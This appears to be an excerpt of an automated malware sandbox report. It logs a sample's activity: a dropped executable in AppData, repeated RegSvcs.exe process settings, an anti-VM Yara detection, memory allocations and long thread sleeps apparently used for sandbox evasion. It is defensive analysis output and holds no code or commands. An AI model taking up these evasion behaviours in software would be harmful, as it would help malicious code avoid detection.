Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: djqdPdQRO.exe PID: 6628, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	Memory allocated: 1940000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 3420000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 19A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 9460000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: A460000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: A660000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: B660000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Memory allocated: 9B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Memory allocated: 2720000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Memory allocated: 2570000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Memory allocated: 8300000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Memory allocated: 9300000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Memory allocated: 94F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Memory allocated: A4F0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599327	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599108	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598999	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598452	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596355	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595905	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595685	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594593	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000
